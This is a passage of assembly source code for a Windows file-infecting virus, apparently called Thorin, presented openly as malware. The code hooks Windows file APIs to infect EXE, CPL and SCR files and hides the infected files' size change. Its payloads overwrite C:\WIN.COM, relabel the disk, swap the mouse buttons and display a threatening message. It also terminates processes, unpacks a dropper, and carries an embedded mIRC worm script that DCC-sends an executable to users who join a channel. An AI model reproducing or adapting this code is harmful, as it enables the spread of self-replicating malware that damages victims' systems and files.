lodsd
|
|||
|
mov ecx,eax
|
|||
|
pop esi
|
|||
|
add esi,dword ptr [ebp+imagebase]
|
|||
|
|
|||
|
SearchK32:
|
|||
|
push esi
|
|||
|
mov esi,[esi+0Ch]
|
|||
|
add esi,dword ptr [ebp+imagebase]
|
|||
|
lea edi,[ebp+K32_DLL]
|
|||
|
mov ecx,K32_Size
|
|||
|
cld
|
|||
|
push ecx
|
|||
|
rep cmpsb
|
|||
|
pop ecx
|
|||
|
pop esi
|
|||
|
jz gotcha
|
|||
|
add esi,14h
|
|||
|
jmp SearchK32
|
|||
|
gotcha:
|
|||
|
cmp byte ptr [esi],00h
|
|||
|
jz nopes
|
|||
|
mov edx,[esi+10h]
|
|||
|
add edx,dword ptr [ebp+imagebase]
|
|||
|
lodsd
|
|||
|
jz nopes
|
|||
|
|
|||
|
xchg edx,eax
|
|||
|
add edx,[ebp+imagebase]
|
|||
|
xor ebx,ebx
|
|||
|
loopy:
|
|||
|
cmp dword ptr [edx+00h],00h
|
|||
|
jz nopes
|
|||
|
cmp byte ptr [edx+03h],80h
|
|||
|
jz reloop
|
|||
|
|
|||
|
mov edi,dword ptr [ebp+TempGA_IT1]
|
|||
|
mov ecx,dword ptr [ebp+TempGA_IT2]
|
|||
|
mov esi,[edx]
|
|||
|
add esi,dword ptr [ebp+imagebase]
|
|||
|
add esi,2
|
|||
|
push ecx
|
|||
|
rep cmpsb
|
|||
|
pop ecx
|
|||
|
jz wegotit
|
|||
|
reloop:
|
|||
|
inc ebx
|
|||
|
add edx,4
|
|||
|
loop loopy
|
|||
|
wegotit:
|
|||
|
shl ebx,2
|
|||
|
add ebx,eax
|
|||
|
mov eax,[ebx]
|
|||
|
db 0B1h
|
|||
|
nopes:
|
|||
|
stc
|
|||
|
ret
|
|||
|
GetAPI_IT endp
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Payloads
|
|||
|
; ===========================================================================
|
|||
|
; White trash get down on your knees... and you'll get cake and sodomy!
|
|||
|
|
|||
|
payload proc
|
|||
|
apicall _GetTickCount ; Get a random payload
|
|||
|
and eax,payload_number
|
|||
|
lea esi,[ebp+payload_table+eax*4]
|
|||
|
lodsd
|
|||
|
add eax,ebp
|
|||
|
call eax ; Call to it
|
|||
|
ret
|
|||
|
payload endp
|
|||
|
|
|||
|
payload1 proc
|
|||
|
push 00000000h ; Mmm, a new win.com :)
|
|||
|
push 00000080h
|
|||
|
push 00000002h
|
|||
|
push 00000000h
|
|||
|
push 00000001h
|
|||
|
push 40000000h
|
|||
|
call ___
|
|||
|
db "C:\WIN.COM",0
|
|||
|
___: apicall _CreateFileA
|
|||
|
push eax
|
|||
|
push 00000000h
|
|||
|
lea ebx,[ebp+iobytes]
|
|||
|
push ebx
|
|||
|
push p_size
|
|||
|
lea ebx,[ebp+payl0ad]
|
|||
|
push ebx
|
|||
|
push eax
|
|||
|
apicall _WriteFile
|
|||
|
apicall _CloseHandle
|
|||
|
ret
|
|||
|
payload1 endp
|
|||
|
|
|||
|
payload2 proc
|
|||
|
call __
|
|||
|
db "THORIN",0 ; HD Name is... THORIN :)
|
|||
|
__: push 00000000h
|
|||
|
apicall _SetVolumeLabelA
|
|||
|
ret
|
|||
|
payload2 endp
|
|||
|
|
|||
|
payload3 proc
|
|||
|
push 00000001h
|
|||
|
apicall _SwapMouseButton ; Left is right, right is left
|
|||
|
ret
|
|||
|
payload3 endp
|
|||
|
|
|||
|
payload4 proc
|
|||
|
push 00001010h ; Display message
|
|||
|
lea eax,[ebp+vname]
|
|||
|
push eax
|
|||
|
call _2
|
|||
|
|
|||
|
; Stupid message to annoy user... panic ain't good, but... what is good? ;)
|
|||
|
|
|||
|
db "Thorin... Thorin... Thorin... Thorin... Thorin...",13,13
|
|||
|
db "I am Thorin, son of Thrain, son of Thror",13
|
|||
|
db "and your computer is mine... mwahahahahaha!",13
|
|||
|
db "I will give you... the death you deserve!",13,13
|
|||
|
db "...Thorin ...Thorin ...Thorin ...Thorin ...Thorin",0
|
|||
|
|
|||
|
_2: push 00000000h
|
|||
|
apicall _MessageBoxA
|
|||
|
payload4 endp
|
|||
|
|
|||
|
payload5 proc
|
|||
|
lea ebx,[ebp+szSHELL32]
|
|||
|
push ebx
|
|||
|
apicall _LoadLibraryA ; Get SHELL32 base address
|
|||
|
lea ecx,[ebp+@ShellExecuteA]
|
|||
|
push ecx
|
|||
|
push eax
|
|||
|
apicall _GetProcAddress ; Get ShellExecuteA address
|
|||
|
xor ebx,ebx
|
|||
|
push ebx
|
|||
|
push ebx
|
|||
|
push ebx
|
|||
|
lea ecx,[ebp+szMicro$oft]
|
|||
|
push ecx
|
|||
|
lea ecx,[ebp+szOPEN]
|
|||
|
push ecx
|
|||
|
push ebx
|
|||
|
call eax ; Open Micro$oft web
|
|||
|
ret
|
|||
|
payload5 endp
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Some miscellaneous functions
|
|||
|
; ===========================================================================
|
|||
|
; ALIGN
|
|||
|
;
|
|||
|
; input:
|
|||
|
; EAX = Number to align
|
|||
|
; ECX = Alignment factor
|
|||
|
; output:
|
|||
|
; EAX = Aligned number
|
|||
|
;
|
|||
|
|
|||
|
Align proc
|
|||
|
push edx
|
|||
|
xor edx,edx
|
|||
|
push eax
|
|||
|
div ecx
|
|||
|
pop eax
|
|||
|
sub ecx,edx
|
|||
|
add eax,ecx
|
|||
|
pop edx
|
|||
|
ret
|
|||
|
Align endp
|
|||
|
|
|||
|
; TRUNCFILE
|
|||
|
;
|
|||
|
; input:
|
|||
|
; ECX = Where trunc file
|
|||
|
; output:
|
|||
|
; Nothing.
|
|||
|
;
|
|||
|
|
|||
|
TruncFile proc
|
|||
|
xor eax,eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push ecx
|
|||
|
push dword ptr [ebp+FileHandle]
|
|||
|
apicall _SetFilePointer
|
|||
|
push dword ptr [ebp+FileHandle]
|
|||
|
apicall _SetEndOfFile
|
|||
|
ret
|
|||
|
TruncFile endp
|
|||
|
|
|||
|
; OPENFILE
|
|||
|
;
|
|||
|
; input:
|
|||
|
; ESI = Pointer to file
|
|||
|
; output:
|
|||
|
; EAX = Handle (if succesful) / -1 (if failed)
|
|||
|
;
|
|||
|
|
|||
|
OpenFile proc
|
|||
|
xor eax,eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push 00000003h
|
|||
|
push eax
|
|||
|
inc eax
|
|||
|
push eax
|
|||
|
push 40000000h or 80000000h
|
|||
|
push esi
|
|||
|
apicall _CreateFileA
|
|||
|
ret
|
|||
|
OpenFile endp
|
|||
|
|
|||
|
; CREATEMAP
|
|||
|
;
|
|||
|
; input:
|
|||
|
; ECX = Size to map
|
|||
|
; output:
|
|||
|
; EAX = Handle (if succesful) / 0 (if failed)
|
|||
|
;
|
|||
|
|
|||
|
CreateMap proc
|
|||
|
xor eax,eax
|
|||
|
push eax
|
|||
|
push ecx
|
|||
|
push eax
|
|||
|
push 00000004h
|
|||
|
push eax
|
|||
|
push dword ptr [ebp+FileHandle]
|
|||
|
apicall _CreateFileMappingA
|
|||
|
ret
|
|||
|
CreateMap endp
|
|||
|
|
|||
|
; MAPFILE
|
|||
|
;
|
|||
|
; input:
|
|||
|
; ECX = Size to map
|
|||
|
; output:
|
|||
|
; EAX = Handle (if succesful) / 0 (if failed)
|
|||
|
|
|||
|
MapFile proc
|
|||
|
xor eax,eax
|
|||
|
push ecx
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push 000F001Fh
|
|||
|
push dword ptr [ebp+MapHandle]
|
|||
|
apicall _MapViewOfFile
|
|||
|
ret
|
|||
|
MapFile endp
|
|||
|
|
|||
|
; REGEXIST
|
|||
|
;
|
|||
|
; input:
|
|||
|
; ESI = Pointer to key name
|
|||
|
; output:
|
|||
|
; CF = Set to 1 if it exist, to 0 if it doesn't
|
|||
|
;
|
|||
|
|
|||
|
RegExist proc
|
|||
|
lea eax,[ebp+RegHandle]
|
|||
|
push eax
|
|||
|
push 000F003Fh
|
|||
|
push 00000000h
|
|||
|
push esi
|
|||
|
push 80000001h
|
|||
|
apicall _RegOpenKeyExA
|
|||
|
cmp eax,2
|
|||
|
jz RegExistExitCF0
|
|||
|
push dword ptr [ebp+RegHandle]
|
|||
|
apicall _CloseHandle
|
|||
|
stc
|
|||
|
ret
|
|||
|
RegExistExitCF0:
|
|||
|
clc
|
|||
|
ret
|
|||
|
RegExist endp
|
|||
|
|
|||
|
; PUTREG
|
|||
|
;
|
|||
|
; input:
|
|||
|
; ESI = Pointer to key name
|
|||
|
; output:
|
|||
|
; Nothing.
|
|||
|
;
|
|||
|
|
|||
|
PutReg proc
|
|||
|
lea eax,[ebp+Disposition]
|
|||
|
push eax
|
|||
|
lea eax,[ebp+RegHandle]
|
|||
|
push eax
|
|||
|
xor eax,eax
|
|||
|
push eax
|
|||
|
push 000F003Fh
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push esi
|
|||
|
push 80000001h
|
|||
|
apicall _RegCreateKeyExA
|
|||
|
push dword ptr [ebp+RegHandle]
|
|||
|
apicall _CloseHandle
|
|||
|
ret
|
|||
|
PutReg endp
|
|||
|
|
|||
|
; DELREG
|
|||
|
;
|
|||
|
; input:
|
|||
|
; ESI = Pointer to key name
|
|||
|
; output:
|
|||
|
; Nothing.
|
|||
|
;
|
|||
|
|
|||
|
DelReg proc
|
|||
|
push esi
|
|||
|
push 80000001h
|
|||
|
apicall _RegDeleteKeyA
|
|||
|
ret
|
|||
|
DelReg endp
|
|||
|
|
|||
|
; TERMINATEPROC
|
|||
|
;
|
|||
|
; input:
|
|||
|
; EDI = Pointer to the name of the window of the process we wanna kill
|
|||
|
; output:
|
|||
|
; CF = Set to 1 if it wasn't found or killed, to 0 if it was killed
|
|||
|
;
|
|||
|
|
|||
|
TerminateProc proc
|
|||
|
xor ebx,ebx ; Thnx 2 Bennyg0d :)
|
|||
|
push edi
|
|||
|
push ebx
|
|||
|
apicall _FindWindowA
|
|||
|
xchg eax,ecx
|
|||
|
jecxz TP_ErrorExit
|
|||
|
push ebx
|
|||
|
push ebx
|
|||
|
push 00000012h
|
|||
|
push ecx
|
|||
|
apicall _PostMessageA
|
|||
|
mov cl,00h
|
|||
|
org $-1
|
|||
|
TP_ErrorExit:
|
|||
|
stc
|
|||
|
ret
|
|||
|
TerminateProc endp
|
|||
|
|
|||
|
; GETLASTSECTION
|
|||
|
;
|
|||
|
; input:
|
|||
|
; ESI = Pointer to PE header
|
|||
|
; output:
|
|||
|
; ESI = Pointer to last section
|
|||
|
; EDI = Pointer to PE header
|
|||
|
;
|
|||
|
|
|||
|
GetLastSection proc
|
|||
|
mov edi,esi
|
|||
|
movzx eax,word ptr [edi+06h] ; Get ptr to last section
|
|||
|
dec eax
|
|||
|
imul eax,eax,28h ; C'mon, feel the noise...
|
|||
|
add esi,eax
|
|||
|
add esi,78h
|
|||
|
mov edx,[edi+74h]
|
|||
|
shl edx,03h
|
|||
|
add esi,edx
|
|||
|
ret
|
|||
|
GetLastSection endp
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Get Delta Offset
|
|||
|
; ===========================================================================
|
|||
|
;
|
|||
|
; input:
|
|||
|
; Nothing.
|
|||
|
; output:
|
|||
|
; ECX = Delta Offset
|
|||
|
;
|
|||
|
|
|||
|
GetDeltaOffset proc
|
|||
|
call getitright ; Oh! What is this? Incredible!
|
|||
|
getitright:
|
|||
|
pop ebp
|
|||
|
sub ebp,offset getitright
|
|||
|
ret
|
|||
|
GetDeltaOffset endp
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Dropper unpacker (25 bytes) <<->> [LSCE] - Little Shitty Compression Engine
|
|||
|
; ===========================================================================
|
|||
|
;
|
|||
|
; ??? ??????? ??????? ???????
|
|||
|
; ? ? ? ????? ? ????? ? ????? The Little and Shitty Compression Engine
|
|||
|
; ? ????? ????? ? ? ????? ? ????? Poorly coded and written by...
|
|||
|
; ??????? ??????? ??????? ??????? Who cares? :) Well... by me. Any problem?
|
|||
|
;
|
|||
|
; This is a very simple packing engine, based in the repetition of zeros that
|
|||
|
; the PE files have, thus it is able to compress a PE file... Hehehe, i can
|
|||
|
; put a dropper without caring about its space! That was the only reason of
|
|||
|
; make this little shit. Maybe one day i will make a 'real' compression engi-
|
|||
|
; ne, but today i'm too busy :)
|
|||
|
;
|
|||
|
; input:
|
|||
|
; EDI = Offset where unpack
|
|||
|
; ESI = Data to unpack
|
|||
|
; ECX = Size of packed data
|
|||
|
; output:
|
|||
|
; Nothing.
|
|||
|
;
|
|||
|
|
|||
|
LSCE_UnPack proc
|
|||
|
xor eax,eax ; 2 bytes Hehehe, i
|
|||
|
process_byte: ; think i'm
|
|||
|
lodsb ; 1 byte turning a
|
|||
|
or al,al ; 2 bytes little bit
|
|||
|
jnz store_byte ; 2 bytes paranoid...
|
|||
|
dec ecx ; 1 byte
|
|||
|
dec ecx ; 1 byte
|
|||
|
lodsw ; 2 bytes
|
|||
|
push ecx ; 1 byte
|
|||
|
xor ecx,ecx ; 2 bytes
|
|||
|
xchg eax,ecx ; 1 byte
|
|||
|
rep stosb ; 2 bytes
|
|||
|
pop ecx ; 1 byte
|
|||
|
loop process_byte ; 2 bytes
|
|||
|
jecxz all_unpacked ; 2 bytes
|
|||
|
store_byte:
|
|||
|
stosb ; 1 byte
|
|||
|
loop process_byte ; 2 bytes
|
|||
|
all_unpacked:
|
|||
|
ret ; 2 bytes
|
|||
|
LSCE_UnPack endp
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Hook all the possible APIs, of host IT
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
HookAllAPIs:
|
|||
|
mov eax,dword ptr [ebp+ModBase] ; file modbase=file imagebase
|
|||
|
mov dword ptr [ebp+imagebase],eax
|
|||
|
|
|||
|
lea edi,[ebp+@@Hookz] ; Ptr to the first API
|
|||
|
nxtapi: push edi
|
|||
|
call GetAPI_IT ; Get it from Import Table
|
|||
|
pop edi
|
|||
|
jc Next_IT_Struc_ ; Fail? Damn...
|
|||
|
|
|||
|
xor al,al ; Reach the end of API string
|
|||
|
scasb
|
|||
|
jnz $-1
|
|||
|
|
|||
|
mov eax,[edi] ; All must be in its place :)
|
|||
|
add eax,ebp
|
|||
|
mov [ebx],eax
|
|||
|
Next_IT_Struc:
|
|||
|
add edi,4
|
|||
|
cmp byte ptr [edi],"" ; Reach the last api? Grrr...
|
|||
|
jz AllHooked
|
|||
|
jmp nxtapi
|
|||
|
AllHooked:
|
|||
|
ret
|
|||
|
|
|||
|
Next_IT_Struc_:
|
|||
|
xor al,al
|
|||
|
scasb
|
|||
|
jnz $-1
|
|||
|
jmp Next_IT_Struc
|
|||
|
|
|||
|
; A bard was our savior!
|
|||
|
|
|||
|
db 0,"[Glory to the Bards!]",0
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Hooks' code
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
HookMoveFileA:
|
|||
|
call DoHookStuff
|
|||
|
jmp [eax+_MoveFileA]
|
|||
|
|
|||
|
HookCopyFileA:
|
|||
|
call DoHookStuff
|
|||
|
jmp [eax+_CopyFileA]
|
|||
|
|
|||
|
HookGetFullPathNameA:
|
|||
|
call DoHookStuff
|
|||
|
jmp [eax+_GetFullPathNameA]
|
|||
|
|
|||
|
HookDeleteFileA:
|
|||
|
call DoHookStuff
|
|||
|
jmp [eax+_DeleteFileA]
|
|||
|
|
|||
|
HookWinExec:
|
|||
|
call DoHookStuff
|
|||
|
jmp [eax+_WinExec]
|
|||
|
|
|||
|
HookCreateFileA:
|
|||
|
call DoHookStuff
|
|||
|
jmp [eax+_CreateFileA]
|
|||
|
|
|||
|
HookCreateProcessA:
|
|||
|
call DoHookStuff
|
|||
|
jmp [eax+_CreateProcessA]
|
|||
|
|
|||
|
HookGetFileAttributesA:
|
|||
|
call DoHookStuff
|
|||
|
jmp [eax+_GetFileAttributesA]
|
|||
|
|
|||
|
HookFindFirstFileA:
|
|||
|
pushad ; Save all reggies
|
|||
|
call GetDeltaOffset ; EBP = Delta Offset
|
|||
|
mov eax,[esp+20h] ; EAX = Return Address
|
|||
|
mov dword ptr [ebp+FFRetAddress],eax
|
|||
|
mov eax,[esp+28h] ; EAX = Ptr to WFD
|
|||
|
mov dword ptr [ebp+FF_WFD],eax
|
|||
|
|
|||
|
mov [esp.PUSHAD_EAX],ebp
|
|||
|
popad
|
|||
|
add esp,4 ; Remove this ret address from
|
|||
|
; stack
|
|||
|
|
|||
|
call [eax+_FindFirstFileA] ; Call original API
|
|||
|
|
|||
|
test eax,eax ; Fail? Shit...
|
|||
|
jz FF_GoAway
|
|||
|
|
|||
|
pushad ; Save reggies and flaggies
|
|||
|
pushfd
|
|||
|
|
|||
|
call GetDeltaOffset ; Delta again
|
|||
|
|
|||
|
movzx ebx,byte ptr [ebp+WFD_Handles_Count] ; Number of active hndlers
|
|||
|
mov edx,[ebp+WFD_HndInMem] ; Our Handle table in mem
|
|||
|
|
|||
|
mov esi,12345678h ; Ptr to filename
|
|||
|
FF_WFD equ $-4
|
|||
|
add esi,(offset WFD_szFileName-offset WIN32_FIND_DATA)
|
|||
|
|
|||
|
cmp ebx,n_Handles ; Over max hnd storing?
|
|||
|
jae AvoidStoring ; Shit...
|
|||
|
|
|||
|
; WFD_Handles structure
|
|||
|
; ?????????????????????
|
|||
|
; +00h WFD Handle
|
|||
|
; +04h Address of its WIN32_FIND_DATA
|
|||
|
|
|||
|
mov dword ptr [edx+ebx*8],eax ; Store Handle
|
|||
|
mov dword ptr [edx+ebx*8+4],esi ; Store WFD offset
|
|||
|
|
|||
|
inc byte ptr [ebp+WFD_Handles_Count]
|
|||
|
|
|||
|
AvoidStoring:
|
|||
|
push esi
|
|||
|
call Check4ValidFile ; Is a reliable file 4 inf?
|
|||
|
pop edi
|
|||
|
jc FF_AvoidInfekt ; Duh!
|
|||
|
|
|||
|
push edi
|
|||
|
call _Infection ; Infect it
|
|||
|
pop esi
|
|||
|
|
|||
|
call Info4Stealth ; Get, if available, old file's
|
|||
|
; size
|
|||
|
jc FF_AvoidInfekt
|
|||
|
|
|||
|
mov ecx,dword ptr [ebp+FF_WFD]
|
|||
|
add ecx,(offset WFD_nFileSizeLow-offset WIN32_FIND_DATA)
|
|||
|
mov [ecx],eax ; Size stealth!
|
|||
|
|
|||
|
FF_AvoidInfekt:
|
|||
|
popfd
|
|||
|
popad
|
|||
|
|
|||
|
FF_GoAway: ; Return to caller
|
|||
|
push 12345678h
|
|||
|
FFRetAddress equ $-4
|
|||
|
ret
|
|||
|
|
|||
|
HookFindNextFileA:
|
|||
|
pushad ; Save all reggies
|
|||
|
call GetDeltaOffset ; Get delta offset
|
|||
|
mov eax,[esp+20h] ; EAX = Return address
|
|||
|
mov dword ptr [ebp+FNRetAddress],eax
|
|||
|
mov eax,[esp+24h] ; EAX = Search Handle
|
|||
|
mov dword ptr [ebp+FN_Hnd],eax
|
|||
|
mov [esp.PUSHAD_EAX],ebp
|
|||
|
popad
|
|||
|
|
|||
|
add esp,4
|
|||
|
|
|||
|
call [eax+_FindNextFileA] ; Call original API
|
|||
|
or eax,eax ; Fail? Damn.
|
|||
|
jz FN_GoAway
|
|||
|
|
|||
|
pushad ; Save regs and flags
|
|||
|
pushfd
|
|||
|
|
|||
|
call GetDeltaOffset ; Get delta again
|
|||
|
|
|||
|
mov eax,12345678h ; EAX = Search Handle
|
|||
|
FN_Hnd equ $-4
|
|||
|
|
|||
|
call Check4ValidHandle ; Is in our table? If yes,
|
|||
|
jc FN_AvoidInfekt ; infect.
|
|||
|
|
|||
|
xchg esi,eax ; ESI = Pointer to WFD
|
|||
|
|
|||
|
mov dword ptr [ebp+FN_FS],esi ; Save if for later
|
|||
|
add esi,(offset WFD_szFileName-offset WIN32_FIND_DATA)
|
|||
|
push esi ; ESI = Ptr to filename
|
|||
|
call Check4ValidFile ; Is reliable its inf.?
|
|||
|
pop edi
|
|||
|
jc FN_AvoidInfekt ; Duh...
|
|||
|
push edi
|
|||
|
call _Infection ; Infect it !
|
|||
|
pop esi
|
|||
|
call Info4Stealth ; Retrieve info for possible
|
|||
|
; stealth...
|
|||
|
jc FN_AvoidInfekt
|
|||
|
|
|||
|
mov ecx,12345678h
|
|||
|
FN_FS equ $-4
|
|||
|
add ecx,(offset WFD_nFileSizeLow-offset WIN32_FIND_DATA)
|
|||
|
mov [ecx],eax ; Size Stealth, dude!
|
|||
|
|
|||
|
FN_AvoidInfekt:
|
|||
|
popfd ; Restore flags & regs
|
|||
|
popad
|
|||
|
|
|||
|
FN_GoAway: ; Return to caller
|
|||
|
push 12345678h
|
|||
|
FNRetAddress equ $-4
|
|||
|
ret
|
|||
|
|
|||
|
HookGetProcAddress:
|
|||
|
pushad ; Save all the registers
|
|||
|
call GetDeltaOffset ; EBP = Delta Offset
|
|||
|
mov eax,[esp+24h] ; EAX = Base address of module
|
|||
|
cmp eax,dword ptr [ebp+kernel] ; Is EAX=K32?
|
|||
|
jnz OriginalGPA ; If not, it's not our problem
|
|||
|
mov [esp.PUSHAD_EAX],ebp
|
|||
|
popad
|
|||
|
pop dword ptr [eax+HGPA_RetAddress] ; Put ret address in a safe place
|
|||
|
|
|||
|
call [eax+_GetProcAddress] ; Call original API
|
|||
|
or eax,eax ; Fail? Duh!
|
|||
|
jz HGPA_SeeYa
|
|||
|
|
|||
|
pushad
|
|||
|
xchg eax,ebx ; EBX = Address of function
|
|||
|
|
|||
|
call GetDeltaOffset ; EBP = Delta offset
|
|||
|
|
|||
|
mov ecx,n_HookedAPIs ; ECX = Number of hooked apis
|
|||
|
lea esi,[ebp+@@HookedOffsetz] ; ESI = Ptr to array of API
|
|||
|
; addresses
|
|||
|
xor edx,edx ; EDX = Counter (set to 0)
|
|||
|
HGPA_IsHookableAPI?:
|
|||
|
lodsd ; EAX = API from array
|
|||
|
cmp ebx,eax ; Is equal to requested address?
|
|||
|
jz HGPA_IndeedItIs ; If yes, it's interesting 4 us
|
|||
|
inc edx ; Increase counter
|
|||
|
loop HGPA_IsHookableAPI? ; Search loop
|
|||
|
jmp OriginalGPAx
|
|||
|
|
|||
|
HGPA_IndeedItIs:
|
|||
|
lea edi,[ebp+@@Hookz] ; EDI = Ptr to hooked API strings
|
|||
|
xor ebx,ebx ; EBX = New counter
|
|||
|
HGPA_AndWhatAPI?:
|
|||
|
cmp edx,ebx ; We want EBX = EDX
|
|||
|
jz HGPA_ThisAPI
|
|||
|
xor al,al ; Travel trough the Hooks
|
|||
|
scasb ; structure
|
|||
|
jnz $-1
|
|||
|
add edi,4
|
|||
|
inc ebx
|
|||
|
jmp HGPA_AndWhatAPI?
|
|||
|
HGPA_ThisAPI:
|
|||
|
xor al,al ; EDI = Points to requested
|
|||
|
scasb ; api string
|
|||
|
jnz $-1
|
|||
|
mov eax,[edi] ; Get its offset
|
|||
|
add eax,ebp ; Adjust it to delta
|
|||
|
mov [esp.PUSHAD_EAX],eax
|
|||
|
popad
|
|||
|
|
|||
|
HGPA_SeeYa:
|
|||
|
push 12345678h
|
|||
|
HGPA_RetAddress equ $-4
|
|||
|
ret
|
|||
|
|
|||
|
OriginalGPAx:
|
|||
|
mov [esp.PUSHAD_EAX],ebp
|
|||
|
popad
|
|||
|
push dword ptr [eax+HGPA_RetAddress]
|
|||
|
jmp [eax+_GetProcAddress]
|
|||
|
|
|||
|
OriginalGPA:
|
|||
|
mov [esp.PUSHAD_EAX],ebp
|
|||
|
popad
|
|||
|
jmp [eax+_GetProcAddress]
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Hooked "standard" APIs handler
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
DoHookStuff:
|
|||
|
pushad
|
|||
|
pushfd
|
|||
|
call GetDeltaOffset
|
|||
|
mov edx,[esp+2Ch] ; Get filename to infect
|
|||
|
mov esi,edx
|
|||
|
call Check4ValidFile
|
|||
|
jc ErrorDoHookStuff
|
|||
|
InfectWithHookStuff:
|
|||
|
xchg edi,edx
|
|||
|
call _Infection
|
|||
|
ErrorDoHookStuff:
|
|||
|
popfd ; Preserve all as if nothing
|
|||
|
popad ; happened :)
|
|||
|
push ebp
|
|||
|
call GetDeltaOffset ; Get delta offset
|
|||
|
xchg eax,ebp
|
|||
|
pop ebp
|
|||
|
ret
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Retrieve information for size-stealth
|
|||
|
; ===========================================================================
|
|||
|
;
|
|||
|
; input:
|
|||
|
; ESI = Pointer to file name
|
|||
|
; output:
|
|||
|
; EAX = Old Size (Stored at PE Header+44h)
|
|||
|
; CF = Set to 1 if error (file not infected, I/O, etc)
|
|||
|
;
|
|||
|
|
|||
|
Info4Stealth:
|
|||
|
and byte ptr [ebp+CoolFlag],00h ; Flag to 0
|
|||
|
|
|||
|
call OpenFile ; Open File
|
|||
|
cmp_ eax,I4S_Error
|
|||
|
|
|||
|
mov dword ptr [ebp+FileHandle],eax ; Store its handler
|
|||
|
|
|||
|
push 00000000h ; Get file's size
|
|||
|
push eax
|
|||
|
apicall _GetFileSize
|
|||
|
xchg eax,ecx
|
|||
|
|
|||
|
push ecx ; Create its mapping
|
|||
|
call CreateMap
|
|||
|
pop ecx
|
|||
|
|
|||
|
cmpz_ eax,I4S_Error_CloseFileHnd
|
|||
|
|
|||
|
mov dword ptr [ebp+MapHandle],eax ; Save handler
|
|||
|
|
|||
|
call MapFile ; Create a mapping view
|
|||
|
cmpz_ eax,I4S_Error_CloseMapHnd
|
|||
|
|
|||
|
mov dword ptr [ebp+MapAddress],eax ; Store mapping address
|
|||
|
|
|||
|
mov esi,[eax+3Ch]
|
|||
|
add esi,eax
|
|||
|
cmp dword ptr [esi],"EP" ; Is it PE?
|
|||
|
jnz I4S_Error_UnMapHnd
|
|||
|
|
|||
|
push dword ptr [esi+orig_size] ; Get original's file size
|
|||
|
pop dword ptr [ebp+OldSize] ; And put it in a temp place
|
|||
|
|
|||
|
inc byte ptr [ebp+CoolFlag] ; Set flag to 1
|
|||
|
|
|||
|
I4S_Error_UnMapHnd:
|
|||
|
push dword ptr [ebp+MapAddress] ; Close map view of file
|
|||
|
apicall _UnmapViewOfFile
|
|||
|
|
|||
|
I4S_Error_CloseMapHnd:
|
|||
|
push dword ptr [ebp+MapHandle] ; Close map handle
|
|||
|
apicall _CloseHandle
|
|||
|
|
|||
|
I4S_Error_CloseFileHnd:
|
|||
|
push dword ptr [ebp+FileHandle] ; Close file handle
|
|||
|
apicall _CloseHandle
|
|||
|
|
|||
|
cmp byte ptr [ebp+CoolFlag],00h ; Were we able to open? If yes,
|
|||
|
jz I4S_Error ; leave stack clear...
|
|||
|
|
|||
|
I4S_Successful:
|
|||
|
mov eax,12345678h
|
|||
|
OldSize equ $-4
|
|||
|
mov cl,00h
|
|||
|
org $-1
|
|||
|
I4S_Error:
|
|||
|
stc
|
|||
|
ret
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Check if file infection is reliable
|
|||
|
; ===========================================================================
|
|||
|
;
|
|||
|
; input:
|
|||
|
; ESI = Pointer to file name
|
|||
|
; output:
|
|||
|
; CF = Set to 1 if it's reliable, to 0 if it isn't
|
|||
|
;
|
|||
|
|
|||
|
Check4ValidFile:
|
|||
|
lodsb
|
|||
|
or al,al ; Find NULL? Shit...
|
|||
|
jz C4VF_Error
|
|||
|
cmp al,"." ; Dot found? Interesting...
|
|||
|
jnz Check4ValidFile
|
|||
|
dec esi
|
|||
|
lodsd ; Put extension in EAX
|
|||
|
or eax,20202020h ; Make string locase
|
|||
|
not eax
|
|||
|
cmp eax,not "exe." ; Is it an EXE? Infect!!!
|
|||
|
jz C4VF_Successful
|
|||
|
cmp eax,not "lpc." ; Is it a CPL? Infect!!!
|
|||
|
jz C4VF_Successful
|
|||
|
cmp eax,not "rcs." ; Is is a SCR? Infect!!!
|
|||
|
jnz C4VF_Error
|
|||
|
C4VF_Successful:
|
|||
|
mov cl,00h
|
|||
|
org $-1
|
|||
|
C4VF_Error:
|
|||
|
stc
|
|||
|
ret
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; Check if handle was stored previously
|
|||
|
; ===========================================================================
|
|||
|
;
|
|||
|
; input:
|
|||
|
; EAX = Handle
|
|||
|
; output:
|
|||
|
; EAX = WFD Offset of given handle
|
|||
|
; EDX = Places what it occupies in WFD_Handles structure
|
|||
|
; CF = Set to 1 if it's found, to 0 if it wasn't
|
|||
|
;
|
|||
|
|
|||
|
Check4ValidHandle:
|
|||
|
xor edx,edx
|
|||
|
mov edi,[ebp+WFD_HndInMem]
|
|||
|
C4VH_l00p:
|
|||
|
cmp edx,n_Handles ; Over limits? Shit...
|
|||
|
jae C4VH_Error
|
|||
|
|
|||
|
cmp eax,[edx*8+edi] ; EAX = a handler stored in
|
|||
|
jz C4VH_Successful ; table
|
|||
|
|
|||
|
inc edx ; Increase counter
|
|||
|
jmp C4VH_l00p
|
|||
|
C4VH_Successful:
|
|||
|
mov eax,[edx*8+edi+4] ; EAX = WFD Offset
|
|||
|
|
|||
|
mov cl,00h
|
|||
|
org $-1
|
|||
|
C4VH_Error:
|
|||
|
stc
|
|||
|
ret
|
|||
|
|
|||
|
; ===========================================================================
|
|||
|
; mIRC worm
|
|||
|
; ===========================================================================
|
|||
|
|
|||
|
mIRCWorm db "[script]",10
|
|||
|
db "n0=ON 1:JOIN:#: {/if ($nick==$me) { halt }",10
|
|||
|
db "n1=/dcc send $nick c:\pr0n.exe",10
|
|||
|
db "n2=}",10
|
|||
|
db "n3=ON 1:TEXT:*pr0n*:#:/quit Win32.mIRC32.Thorin 1.00",10
|
|||
|
